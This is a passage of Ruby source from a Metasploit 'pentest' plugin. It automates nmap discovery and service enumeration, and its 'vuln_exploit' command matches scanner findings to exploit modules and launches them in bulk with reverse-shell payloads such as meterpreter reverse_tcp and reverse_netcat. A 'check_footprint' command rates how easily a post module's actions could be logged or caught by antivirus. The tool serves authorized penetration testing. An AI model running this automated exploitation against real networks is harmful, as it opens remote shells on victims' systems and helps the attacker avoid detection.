(ips_given.any? {|ip| route_ips.include?(ip)}) print_error("Trying to scan thru a Pivot please use pivot_net_discovery command") return else # Collect current set of hosts and services before the scan current_hosts = framework.db.workspace.hosts.where(state: "alive") current_services = framework.db.workspace.services.where(state: "open") # Run the nmap scan, this will populate the database with the hosts and services that will be processed by the discovery modules if scan_type =~ /-A/ cmd_str = "#{scan_type} -T4 -p #{ports * ","} --max-rtt-timeout=500ms --initial-rtt-timeout=200ms --min-rtt-timeout=200ms --open --stats-every 5s #{range}" run_porscan(cmd_str) else cmd_str = "#{scan_type} -T4 -p #{udp_ports * ","} --max-rtt-timeout=500ms --initial-rtt-timeout=200ms --min-rtt-timeout=200ms --open --stats-every 5s #{range}" run_porscan(cmd_str) end # Get a list of the new hosts and services after the scan and extract the new services and hosts after_hosts = framework.db.workspace.hosts.where(state: "alive") after_services = framework.db.workspace.services.where(state: "open") new_hosts = after_hosts - current_hosts print_good("New hosts found: #{new_hosts.count}") new_services = after_services - current_services print_good("New services found: #{new_services.count}") end if disc_mods # Do service discovery only if new services where found if new_services.count > 0 run_smb(new_services,smb_user,smb_pass,smb_dom,maxjobs,verbose) run_version_scans(new_services,maxjobs,verbose) else print_status("No new services where found to enumerate.") end end end # Run Post Module against specified session and hash of options def run_post(session, mod, opts) m = framework.post.create(mod) begin # Check that the module is compatible with the session specified if m.session_compatible?(session.to_i) m.datastore['SESSION'] = session.to_i # Process the option provided as a hash opts.each do |o,v| m.datastore[o] = v end # Validate the Options m.options.validate(m.datastore) # Inform what Post module is being ran print_status("Running #{mod} against #{session}") # Execute the Post Module m.run_simple( 'LocalInput' => driver.input, 'LocalOutput' => driver.output ) end rescue print_error("Could not run post module against sessions #{s}") end end # Remove services marked as close def cleanup() print_status("Removing services reported as closed from the workspace...") framework.db.workspace.services.where(state: "closed").each do |s| s.destroy end print_status("All services reported removed.") end # Get the specific count of jobs which name contains a specified text def get_job_count(type="scanner") job_count = 0 framework.jobs.each do |k,j| if j.name =~ /#{type}/ job_count = job_count + 1 end end return job_count end # Wait for commands to finish def jobwaiting(maxjobs, verbose, jtype) while(get_job_count(jtype) >= maxjobs) ::IO.select(nil, nil, nil, 2.5) if verbose print_status("waiting for some modules to finish") end end end # Get a list of IP's that are routed thru a Meterpreter sessions # Note: This one bit me hard!! in testing. Make sure that the proper module is ran against # the proper host def get_routed_ips routed_ips = [] pivot = Rex::Socket::SwitchBoard.instance unless (pivot.routes.to_s == "") || (pivot.routes.to_s == "[]") pivot.routes.each do |r| sn = r.subnet nm = r.netmask cidr = Rex::Socket.addr_atoc(nm) pivot_ip_range = Rex::Socket::RangeWalker.new("#{sn}/#{cidr}") pivot_ip_range.each do |i| routed_ips << i end end end return routed_ips end # Method for running auxiliary modules given the module name and options in a hash def run_aux_module(mod, opts, as_job=true) m = framework.auxiliary.create(mod) if !m.nil? opts.each do |o,v| m.datastore[o] = v end m.options.validate(m.datastore) m.run_simple( 'LocalInput' => driver.input, 'LocalOutput' => driver.output, 'RunAsJob' => as_job ) else print_error("Module #{mod} does not exist") return end end # Generate an up2date list of ports used by exploit modules def get_tcp_port_list # UDP ports udp_ports = [53,67,137,161,123,138,139,1434] # Ports missing by the autogen additional_ports = [465,587,995,993,5433,50001,50002,1524, 6697, 8787, 41364, 48992, 49663, 59034] print_status("Generating list of ports used by Auxiliary Modules") ap = (framework.auxiliary.collect { |n,e| x=e.new; x.datastore['RPORT'].to_i}).compact print_status("Generating list of ports used by Exploit Modules") ep = (framework.exploits.collect { |n,e| x=e.new; x.datastore['RPORT'].to_i}).compact # Join both list removing the duplicates port_list = (((ap | ep) - [0,1]) - udp_ports) + additional_ports return port_list end # Run Nmap scan with values provided def run_porscan(cmd_str) print_status("Running NMap with options #{cmd_str}") driver.run_single("db_nmap #{cmd_str}") return true end # Run SMB Enumeration modules def run_smb(services, user, pass, dom, maxjobs, verbose) smb_mods = [ {"mod" => "scanner/smb/smb_version", "opt" => nil}, {"mod" => "scanner/smb/smb_enumusers", "opt" => nil}, {"mod" => "scanner/smb/smb_enumshares", "opt" => nil}, ] smb_mods.each do |p| m = framework.auxiliary.create(p["mod"]) services.each do |s| if s.port == 445 m.datastore['RHOSTS'] = s.host.address if not user.nil? and pass.nil? m.datastore['SMBUser'] = user m.datastore['SMBPass'] = pass m.datastore['SMBDomain'] = dom end m.options.validate(m.datastore) print_status("Running #{p['mod']} against #{s.host.address}") m.run_simple( 'LocalInput' => driver.input, 'LocalOutput' => driver.output ) end end jobwaiting(maxjobs,verbose,"scanner") end end # Run version and discovery auxiliary modules depending on port that is open def run_version_scans(services, maxjobs, verbose) # Run version scan by identified services services.each do |s| if (s.port == 135) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address} run_aux_module("scanner/netbios/nbname_probe",opts) jobwaiting(maxjobs,verbose,"scanner") elsif (s.name.to_s == "http" || s.port == 80) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} run_aux_module("scanner/http/http_version",opts) run_aux_module("scanner/http/robots_txt",opts) run_aux_module("scanner/http/open_proxy",opts) run_aux_module("scanner/http/webdav_scanner",opts) run_aux_module("scanner/http/http_put",opts) jobwaiting(maxjobs,verbose,"scanner") next elsif (s.port == 1720) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} run_aux_module("scanner/h323/h323_version",opts) jobwaiting(maxjobs,verbose,"scanner") next elsif (s.name.to_s =~ /http/ or s.port == 443) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port, 'SSL' => true} run_aux_module("scanner/http/http_version",opts) run_aux_module("scanner/vmware/esx_fingerprint",opts) run_aux_module("scanner/http/robots_txt",opts) run_aux_module("scanner/http/open_proxy",opts) run_aux_module("scanner/http/webdav_scanner",opts) run_aux_module("scanner/http/http_put",opts) jobwaiting(maxjobs,verbose,"scanner") next elsif (s.name.to_s == "ftp" or s.port == 21) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} run_aux_module("scanner/ftp/ftp_version",opts) run_aux_module("scanner/ftp/anonymous",opts) jobwaiting(maxjobs,verbose,"scanner") next elsif (s.name.to_s == "telnet" or s.port == 23) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} run_aux_module("scanner/telnet/telnet_version",opts) run_aux_module("scanner/telnet/telnet_encrypt_overflow",opts) jobwaiting(maxjobs,verbose,"scanner") next elsif (s.name.to_s =~ /vmware-auth|vmauth/ or s.port == 902) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} run_aux_module("scanner/vmware/vmauthd_version)",opts) jobwaiting(maxjobs,verbose,"scanner") next elsif (s.name.to_s == "ssh" or s.port == 22) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} run_aux_module("scanner/ssh/ssh_version",opts) jobwaiting(maxjobs,verbose,"scanner") next elsif (s.name.to_s == "smtp" or s.port.to_s =~/25|465|587/) and s.info.to_s == "" if s.port == 465 opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port, 'SSL' => true} else opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} end run_aux_module("scanner/smtp/smtp_version",opts) jobwaiting(maxjobs,verbose,"scanner") next elsif (s.name.to_s == "pop3" or s.port.to_s =~/110|995/) and s.info.to_s == "" if s.port == 995 opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port, 'SSL' => true} else opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} end run_aux_module("scanner/pop3/pop3_version",opts) jobwaiting(maxjobs,verbose,"scanner") next elsif (s.name.to_s == "imap" or s.port.to_s =~/143|993/) and s.info.to_s == "" if s.port == 993 opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port, 'SSL' => true} else opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} end run_aux_module("scanner/imap/imap_version",opts) jobwaiting(maxjobs,verbose,"scanner") next elsif (s.name.to_s == "mssql" or s.port == 1433) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} run_aux_module("scanner/mssql/mssql_versione",opts) jobwaiting(maxjobs,verbose,"scanner") next elsif (s.name.to_s == "postgres" or s.port.to_s =~/5432|5433/) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address,'RPORT' => s.port} run_aux_module("scanner/postgres/postgres_version",opts) jobwaiting(maxjobs,verbose, "scanner") next elsif (s.name.to_s == "mysql" or s.port == 3306) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} run_aux_module("scanner/mysql/mysql_version",opts) jobwaiting(maxjobs,verbose, "scanner") next elsif (s.name.to_s =~ /h323/ or s.port == 1720) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} run_aux_module("scanner/h323/h323_version",opts) jobwaiting(maxjobs,verbose, "scanner") next elsif (s.name.to_s =~ /afp/ or s.port == 548) opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} run_aux_module("scanner/afp/afp_server_info",opts) jobwaiting(maxjobs,verbose, "scanner") next elsif (s.name.to_s =~ /http/i || s.port == 443) and s.info.to_s =~ /vmware/i opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} run_aux_module("scanner/vmware/esx_fingerprint",opts) jobwaiting(maxjobs,verbose, "scanner") next elsif (s.name.to_s =~ /vnc/i || s.port == 5900) opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} run_aux_module("scanner/vnc/vnc_none_auth",opts) jobwaiting(maxjobs,verbose, "scanner") next elsif (s.name.to_s =~ /jetdirect/i || s.port == 9100) opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} run_aux_module("scanner/printer/printer_version_info",opts) run_aux_module("scanner/printer/printer_ready_message",opts) run_aux_module("scanner/printer/printer_list_volumes",opts) run_aux_module("scanner/printer/printer_list_dir",opts) run_aux_module("scanner/printer/printer_download_file",opts) run_aux_module("scanner/printer/printer_env_vars",opts) jobwaiting(maxjobs,verbose, "scanner") next elsif (s.port == 623) opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} run_aux_module("scanner/ipmi/ipmi_cipher_zero",opts) run_aux_module("scanner/ipmi/ipmi_dumphashes",opts) run_aux_module("scanner/ipmi/ipmi_version",opts) jobwaiting(maxjobs,verbose, "scanner") next elsif (s.port == 6000) opts = {'RHOSTS' => s.host.address, 'RPORT' => s.port} run_aux_module("scanner/x11/open_x11",opts) jobwaiting(maxjobs,verbose, "scanner") next elsif (s.port == 1521) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address,'RPORT' => s.port} run_aux_module("scanner/oracle/tnslsnr_version",opts) jobwaiting(maxjobs,verbose, "scanner") next elsif (s.port == 17185) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address,'RPORT' => s.port} run_aux_module("scanner/vxworks/wdbrpc_bootline",opts) run_aux_module("scanner/vxworks/wdbrpc_version",opts) jobwaiting(maxjobs,verbose, "scanner") next elsif (s.port == 50013) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address,'RPORT' => s.port} run_aux_module("scanner/vxworks/wdbrpc_bootline",opts) run_aux_module("scanner/vxworks/wdbrpc_version",opts) jobwaiting(maxjobs,verbose, "scanner") next elsif (s.port.to_s =~ /50000|50001|50002/) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address,'RPORT' => s.port} run_aux_module("scanner/db2/db2_version",opts) jobwaiting(maxjobs,verbose, "scanner") next elsif (s.port.to_s =~ /50013/) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address,'RPORT' => s.port} run_aux_module("scanner/sap/sap_mgmt_con_getaccesspoints",opts) run_aux_module("scanner/sap/sap_mgmt_con_extractusers",opts) run_aux_module("scanner/sap/sap_mgmt_con_abaplog",opts) run_aux_module("scanner/sap/sap_mgmt_con_getenv",opts) run_aux_module("scanner/sap/sap_mgmt_con_getlogfiles",opts) run_aux_module("scanner/sap/sap_mgmt_con_getprocessparameter",opts) run_aux_module("scanner/sap/sap_mgmt_con_instanceproperties",opts) run_aux_module("scanner/sap/sap_mgmt_con_listlogfiles",opts) run_aux_module("scanner/sap/sap_mgmt_con_startprofile",opts) run_aux_module("scanner/sap/sap_mgmt_con_version",opts) jobwaiting(maxjobs,verbose, "scanner") next elsif (s.port == 8080) and s.info.to_s == "" opts = {'RHOSTS' => s.host.address,'RPORT' => s.port} run_aux_module("scanner/http/sap_businessobjects_version_enum",opts) run_aux_module("scanner/http/open_proxy",opts) jobwaiting(maxjobs,verbose, "scanner") next elsif (s.port == 161 and s.proto == "udp") || (s.name.to_s =~/snmp/) opts = {'RHOSTS' => s.host.address,'RPORT' => s.port} run_aux_module("scanner/snmp/snmp_login",opts) jobwaiting(maxjobs,verbose, "scanner") if s.creds.length > 0 s.creds.each do |c| opts = { 'RHOSTS' => s.host.address, 'RPORT' => s.port, 'VERSION' => "1", 'COMMUNITY' => c.pass } run_aux_module("scanner/snmp/snmp_enum",opts) jobwaiting(maxjobs,verbose,"scanner") opts = { 'RHOSTS' => s.host.address, 'RPORT' => s.port, 'VERSION' => "2c", 'COMMUNITY' => c.pass } run_aux_module("scanner/snmp/snmp_enum",opts) jobwaiting(maxjobs,verbose,"scanner") if s.host.os_name =~ /windows/i opts = { 'RHOSTS' => s.host.address, 'RPORT' => s.port, 'VERSION' => "1", 'COMMUNITY' => c.pass } run_aux_module("scanner/snmp/snmp_enumusers",opts) jobwaiting(maxjobs,verbose,"scanner") opts = { 'RHOSTS' => s.host.address, 'RPORT' => s.port, 'VERSION' => "2c", 'COMMUNITY' => c.pass } run_aux_module("scanner/snmp/snmp_enumusers",opts) jobwaiting(maxjobs,verbose,"scanner") opts = { 'RHOSTS' => s.host.address, 'RPORT' => s.port, 'VERSION' => "1", 'COMMUNITY' => c.pass } run_aux_module("scanner/snmp/snmp_enumshares",opts) jobwaiting(maxjobs,verbose,"scanner") opts = { 'RHOSTS' => s.host.address, 'RPORT' => s.port, 'VERSION' => "2c", 'COMMUNITY' => c.pass } run_aux_module("scanner/snmp/snmp_enumshares",opts) jobwaiting(maxjobs,verbose,"scanner") else opts = { 'RHOSTS' => s.host.address, 'RPORT' => s.port, 'VERSION' => "1", 'COMMUNITY' => c.pass } run_aux_module("scanner/snmp/xerox_workcentre_enumusers",opts) jobwaiting(maxjobs,verbose,"scanner") opts = { 'RHOSTS' => s.host.address, 'RPORT' => s.port, 'VERSION' => "2c", 'COMMUNITY' => c.pass } run_aux_module("scanner/snmp/xerox_workcentre_enumusers",opts) jobwaiting(maxjobs,verbose,"scanner") opts = { 'RHOSTS' => s.host.address, 'RPORT' => s.port, 'VERSION' => "1", 'COMMUNITY' => c.pass } run_aux_module("scanner/snmp/aix_version",opts) jobwaiting(maxjobs,verbose,"scanner") opts = { 'RHOSTS' => s.host.address, 'RPORT' => s.port, 'VERSION' => "2c", 'COMMUNITY' => c.pass } run_aux_module("scanner/snmp/aix_version",opts) jobwaiting(maxjobs,verbose,"scanner") next end end end end end end end # Exploit handling commands ################################################################################################ class AutoExploit include Msf::Ui::Console::CommandDispatcher # Set name for command dispatcher def name "auto_exploit" end # Define Commands def commands { "vuln_exploit" => "Runs exploits based on data imported from vuln scanners.", "show_client_side" => "Show matched client side exploits from data imported from vuln scanners." } end # vuln exploit command def cmd_vuln_exploit(*args) require 'timeout' # Define options opts = Rex::Parser::Arguments.new( "-f" => [ true, "Provide a comma separated list of IP's and Ranges to skip when running exploits."], "-r" => [ true, "Minimum Rank for exploits (low, average, normal, good, great and excellent) good is the default."], "-m" => [ false, "Only show matched exploits."], "-s" => [ false, "Do not limit number of sessions to one per target."], "-j" => [ true, "Max number of concurrent jobs, 3 is the default."], "-h" => [ false, "Command Help"] ) # set variables for options os_type = "" filter = [] range = [] limit_sessions = true matched_exploits = [] min_rank = 100 show_matched = false maxjobs = 3 ranks ={ "low" => 100, "average" => 200, "normal" => 300 , "good" => 400, "great" => 500, "excellent" => 600 } # Parse options opts.parse(args) do |opt, idx, val| case opt when "-f" range = val.gsub(" ","").split(",") when "-r" if ranks.include?(val) min_rank = ranks[val] else print_error("Value of #{val} not in list using default of good.") end when "-s" limit_sessions = false when "-m" show_matched = true when "-j" maxjobs = val.to_i when "-h" print_line(opts.usage) return end end # Make sure that there are vulnerabilities in the table before doing anything else if framework.db.workspace.vulns.length == 0 print_error("No vulnerabilities are present in the database.") return end # generate a list of IP's to not exploit range.each do |r| Rex::Socket::RangeWalker.new(r).each do |i| filter << i end end exploits =[] print_status("Generating List for Matching...") framework.exploits.each_module do |n,e| exploit = {} x=e.new if x.datastore.include?('RPORT') exploit = { :exploit => x.fullname, :port => x.datastore['RPORT'], :platforms => x.platform.names.join(" "), :date => x.disclosure_date, :references => x.references, :rank => x.rank } exploits << exploit end end print_status("Matching Exploits (This will take a while depending on number of hosts)...") framework.db.workspace.hosts.each do |h| # Check that host has vulnerabilities associated in the DB if h.vulns.length > 0 os_type = normalise_os(h.os_name) #payload = chose_pay(h.os_name) exploits.each do |e| found = false next if not e[:rank] >= min_rank if e[:platforms].downcase =~ /#{os_type}/ or e[:platforms].downcase == "" or e[:platforms].downcase =~ /php/i # lets get the proper references e_refs = parse_references(e[:references]) h.vulns.each do |v| v.refs.each do |f| # Filter out Nessus notes next if f.name =~ /^NSS|^CWE/ if e_refs.include?(f.name) and not found # Skip those hosts that are filtered next if filter.include?(h.address) # Save exploits in manner easy to retrieve later exploit = { :exploit => e[:exploit], :port => e[:port], :target => h.address, :rank => e[:rank] } matched_exploits << exploit found = true end end end end end end end if matched_exploits.length > 0 # Sort by rank with highest ranked exploits first matched_exploits.sort! { |x, y| y[:rank] <=> x[:rank] } print_good("Matched Exploits:") matched_exploits.each do |e| print_good("\t#{e[:target]} #{e[:exploit]} #{e[:port]} #{e[:rank]}") end # Only show matched records if user only wanted if selected. return if show_matched # Track LPORTs used known_lports = [] # Make sure that existing jobs do not affect the limit current_jobs = framework.jobs.keys.length maxjobs = current_jobs + maxjobs # Start launching exploits that matched sorted by best ranking first print_status("Running Exploits:") matched_exploits.each do |e| # Select a random port for LPORT port_list = (1024..65000).to_a.shuffle.first port_list = (1024..65000).to_a.shuffle.first if known_lports.include?(port_list) # Check if we are limiting one session per target and enforce if limit_sessions and get_current_sessions.include?(e[:target]) print_good("\tSkipping #{e[:target]} #{e[:exploit]} because a session already exists.") next end # Configure and launch the exploit begin print_status("Creating instance of #{e[:exploit]}") ex = framework.modules.create(e[:exploit]) if ex.nil? print_error("Could not create instance.") end # Choose a payload depending on the best match for the specific exploit ex = chose_pay(ex, e[:target]) if ex.datastore.has_key?('TARGETURI') ex.datastore['TARGETURI'] = e[:target] end ex.datastore['RHOST'] = e[:target] ex.datastore['RPORT'] = e[:port].to_i ex.datastore['LPORT'] = port_list ex.datastore['VERBOSE'] = true (ex.options.validate(ex.datastore)) print_status("Running #{e[:exploit]} against #{e[:target]}") # Provide 20 seconds for a exploit to timeout Timeout::timeout(20) do ex.exploit_simple( 'Payload' => ex.datastore['PAYLOAD'], 'LocalInput' => driver.input, 'LocalOutput' => driver.output, 'RunAsJob' => true ) end rescue Timeout::Error print_error("Exploit #{e[:exploit]} against #{e[:target]} timed out") end jobwaiting(maxjobs) end else print_error("No Exploits where Matched.") return end end # Show client side exploits def cmd_show_client_side(*args) # Define options opts = Rex::Parser::Arguments.new( "-r" => [ true, "Minimum Rank for exploits (low, average, normal, good, great and excellent) good is the default."], "-h" => [ false, "Command Help"] ) # set variables for options os_type = "" matched_exploits = [] min_rank = 100 ranks ={ "low" => 100, "average" => 200, "normal" => 300 , "good" => 400, "great" => 500, "excellent" => 600 } # Parse options opts.parse(args) do |opt, idx, val| case opt when "-r" if ranks.include?(val) min_rank = ranks[val] else print_error("Value of #{val} not in list using default of good.") end when "-h" print_line(opts.usage) return end end exploits =[] # Make sure that there are vulnerabilities in the table before doing anything else if framework.db.workspace.vulns.length == 0 print_error("No vulnerabilities are present in the database.") return end print_status("Generating List for Matching...") framework.exploits.each_module do |n,e| exploit = {} x=e.new if x.datastore.include?('LPORT') exploit = { :exploit => x.fullname, :port => x.datastore['RPORT'], :platforms => x.platform.names.join(" "), :date => x.disclosure_date, :references => x.references, :rank => x.rank } exploits << exploit end end print_status("Matching Exploits (This will take a while depending on number of hosts)...") framework.db.workspace.hosts.each do |h| # Check that host has vulnerabilities associated in the DB if h.vulns.length > 0 os_type = normalise_os(h.os_name) #payload = chose_pay(h.os_name) exploits.each do |e| found = false next if not e[:rank] >= min_rank if e[:platforms].downcase =~ /#{os_type}/ # lets get the proper references e_refs = parse_references(e[:references]) h.vulns.each do |v| v.refs.each do |f| # Filter out Nessus notes next if f.name =~ /^NSS|^CWE/ if e_refs.include?(f.name) and not found # Save exploits in manner easy to retrieve later exploit = { :exploit => e[:exploit], :port => e[:port], :target => h.address, :rank => e[:rank] } matched_exploits << exploit found = true end end end end end end end if matched_exploits.length > 0 # Sort by rank with highest ranked exploits first matched_exploits.sort! { |x, y| y[:rank] <=> x[:rank] } print_good("Matched Exploits:") matched_exploits.each do |e| print_good("\t#{e[:target]} #{e[:exploit]} #{e[:port]} #{e[:rank]}") end else print_status("No Matching Client Side Exploits where found.") end end # Normalize the OS name since different scanner may have entered different values. def normalise_os(os_name) case os_name when /(Microsoft|Windows)/i os = "windows" when /(Linux|Ubuntu|CentOS|RedHat)/i os = "linux" when /aix/i os = "aix" when /(freebsd)/i os = "bsd" when /(hpux|hp-ux)/i os = "hpux" when /solaris/i os = "solaris" when /(Apple|OSX|OS X)/i os = "osx" end return os end # Parse the exploit references and get a list of CVE, BID and OSVDB values that # we can match accurately. def parse_references(refs) references = [] refs.each do |r| # We do not want references that are URLs next if r.ctx_id == "URL" # Format the reference as it is saved by Nessus references << "#{r.ctx_id}-#{r.ctx_val}" end return references end # Choose the proper payload def chose_pay(mod, rhost) # taken from the exploit ui mixin # A list of preferred payloads in the best-first order set_mod = nil pref = [ 'windows/meterpreter/reverse_tcp', 'java/meterpreter/reverse_tcp', 'php/meterpreter/reverse_tcp', 'php/meterpreter_reverse_tcp', 'cmd/unix/interact', 'cmd/unix/reverse', 'cmd/unix/reverse_perl', 'cmd/unix/reverse_netcat', 'windows/meterpreter/reverse_nonx_tcp', 'windows/meterpreter/reverse_ord_tcp', 'windows/shell/reverse_tcp', 'generic/shell_reverse_tcp' ] pset = mod.compatible_payloads.map{|x| x[0] } pref.each do |n| if(pset.include?(n)) print_status("\tPayload choosen is #{n}") mod.datastore['PAYLOAD'] = n mod.datastore['LHOST'] = Rex::Socket.source_address(rhost) return mod else # grab the first compatible payload. print_status("\tCompatible payload not in prefered payload list.") print_status("\tPayload choosen is #{pset[0]}") mod.datastore['PAYLOAD'] = pset[0] mod.datastore['LHOST'] = Rex::Socket.source_address(rhost) return mod end end end # Create a payload given a name, lhost and lport, additional options def create_payload(name, lhost, lport, opts = "") pay = framework.payloads.create(name) pay.datastore['LHOST'] = lhost pay.datastore['LPORT'] = lport if not opts.empty? opts.split(",").each do |o| opt,val = o.split("=", 2) pay.datastore[opt] = val end end # Validate the options for the module if pay.options.validate(pay.datastore) print_good("Payload option validation passed") end return pay end def get_current_sessions() session_hosts = framework.sessions.map { |s,r| r.tunnel_peer.split(":")[0] } return session_hosts end # Method to write string to file def file_write(file2wrt, data2wrt) if not ::File.exists?(file2wrt) ::FileUtils.touch(file2wrt) end output = ::File.open(file2wrt, "a") data2wrt.each_line do |d| output.puts(d) end output.close end def get_job_count job_count = 1 framework.jobs.each do |k,j| if j.name !~ /handler/ job_count = job_count + 1 end end return job_count end def jobwaiting(maxjobs, verbose=true) while(get_job_count >= maxjobs) ::IO.select(nil, nil, nil, 2.5) if verbose print_status("Waiting for some modules to finish") end end end end # Tradecraft commands ################################################################################################ class TradeCraftCommandDispatcher include Msf::Ui::Console::CommandDispatcher # Set name for command dispatcher def name "Tradecraft" end # Define Commands def commands { 'check_footprint' => 'Checks the possible footprint of a post module on a target system.', } end # Function for doing auto complete on module name def tab_complete_module(str, words) res = [] framework.modules.module_types.each do |mtyp| mset = framework.modules.module_names(mtyp) mset.each do |mref| res << mtyp + '/' + mref end end return res.sort end # Function to do tab complete on modules for check_footprint def cmd_check_footprint_tabs(str, words) tab_complete_module(str, words) end def cmd_check_footprint(*args) opts = Rex::Parser::Arguments.new( "-m" => [ true, "Module to check."], "-h" => [ false, "Command Help."] ) post_mod = nil # Parse options opts.parse(args) do |opt, idx, val| case opt when "-m" post_mod = val when "-h" print_line opts.usage return else print_status "Please specify a module to check with the -m option." return end end if post_mod.nil? if active_module path = active_module.file_path if active_module.fullname =~ /^post|^exploit/ m = active_module else print_error "This module is not a exploit or post module." return end if active_module.session_types.include?("shell") print_line "\n%bld%redWARNING%clr This module supports Shell type sessions. All actions may be logged. %bld%redWARNING%clr\n" end module_code = ::File.read(path) else print_error('No module specified.') end else if post_mod =~ /^post/ post_module= post_mod.gsub(/^post\//,"") m = framework.post.create(post_module) elsif post_mod =~ /^exploit/ exploit_module= post_mod.gsub(/^exploit\//,"") m = framework.exploits.create(exploit_module) else print_error "This module is not a exploit or post module." return end if m.session_types.include?("shell") print_line "\n%bld%redWARNING%clr This module supports Shell type sessions. All actions may be logged. %bld%redWARNING%clr\n" end module_code = ::File.read(m.file_path) end indicator_found = false tbl = Rex::Text::Table.new( 'Columns' => [ 'Indicator', 'Description' ]) footprint_generators = { 'cmd_exec' => 'This module will create a process that can be logged.', '.sys.process.execute' => 'This module will create a process that can be logged.', 'run_cmd' => 'This module will create a process that can be logged.', 'check_osql' => 'This module will create a osql.exe process that can be logged.', 'check_sqlcmd' => 'This module will create a sqlcmd.exe process that can be logged.', 'wmic_query' => 'This module will create a wmic.exe process that can be logged.', 'get_whoami' => 'This module will create a whoami.exe process that can be logged.', "service_create" => 'This module manipulates a service in a way that can be logged', "service_start" => 'This module manipulates a service in a way that can be logged', "service_change_config" => 'This module manipulates a service in a way that can be logged', "service_change_startup" => 'This module manipulates a service in a way that can be logged', "get_vss_device" => 'This module will create a wmic.exe process that can be logged.', "vss_list" => 'This module will create a wmic.exe process that can be logged.', "vss_get_ids" => 'This module will create a wmic.exe process that can be logged.', "vss_get_storage" => 'This module will create a wmic.exe process that can be logged.', "get_sc_details" => 'This module will create a wmic.exe process that can be logged.', "get_sc_param" => 'This module will create a wmic.exe process that can be logged.', "vss_get_storage_param" => 'This module will create a wmic.exe process that can be logged.', "vss_set_storage" => 'This module will create a wmic.exe process that can be logged.', "create_shadowcopy" => 'This module will create a wmic.exe process that can be logged.', "start_vss" => 'This module will create a wmic.exe process that can be logged.', "start_swprv" => 'This module manipulates a service in a way that can be logged', "execute_shellcode" => 'This module will create a thread that can be detected (Sysmon).', "is_in_admin_group" => 'This module will create a whoami.exe process that can be logged.', "upload_file" => 'This module uploads a file on to the target, AVs will examine the file and action may be logged if folder is audited.', "file_local_write" => 'This module writes to a file or may create one, action may be logged if folder is audited or examined by AV.', "write_file" => 'This module writes to a file or may create one, action may be logged if folder is audited or examined by AV.', "append_file" => 'This module writes to a file or may create one, action may be logged if folder is audited or examined by AV.', "rename_file" => 'This module renames a file or may create one, action may be logged if folder is audited or examined by AV.' } footprint_generators.each { |key, value| if module_code.include?(key) indicator_found = true tbl << ["%bld%red#{key}%clr",value] end } if indicator_found print_line(tbl.to_s) else print_good("No indicators found.") end end end #------------------------------------------------------------------------------------------------- def initialize(framework, opts) super if framework.db and framework.db.active add_console_dispatcher(PostautoCommandDispatcher) add_console_dispatcher(ProjectCommandDispatcher) add_console_dispatcher(DiscoveryCommandDispatcher) add_console_dispatcher(AutoExploit) add_console_dispatcher(TradeCraftCommandDispatcher) archive_path = ::File.join(Msf::Config.log_directory,"archives") project_paths = ::File.join(Msf::Config.log_directory,"projects") # Create project folder if first run if not ::File.directory?(project_paths) ::FileUtils.mkdir_p(project_paths) end # Create archive folder if first run if not ::File.directory?(archive_path) ::FileUtils.mkdir_p(archive_path) end banner = %{ ___ _ _ ___ _ _ | _ \\___ _ _| |_ ___ __| |_ | _ \\ |_ _ __ _(_)_ _ | _/ -_) ' \\ _/ -_|_-< _| | _/ | || / _` | | ' \\ |_| \\___|_||_\\__\\___/__/\\__| |_| |_|\\_,_\\__, |_|_||_| |___/ } print_line banner print_line "Version 1.6" print_line "Pentest plugin loaded." print_line "by Carlos Perez (carlos_perez[at]darkoperator.com)" else print_error("This plugin requires the framework to be connected to a Database!") end end def cleanup remove_console_dispatcher('Postauto') remove_console_dispatcher('Project') remove_console_dispatcher('Discovery') remove_console_dispatcher('auto_exploit') remove_console_dispatcher('Tradecraft') end def name "pentest" end def desc "Plugin for Post-Exploitation automation." end protected end end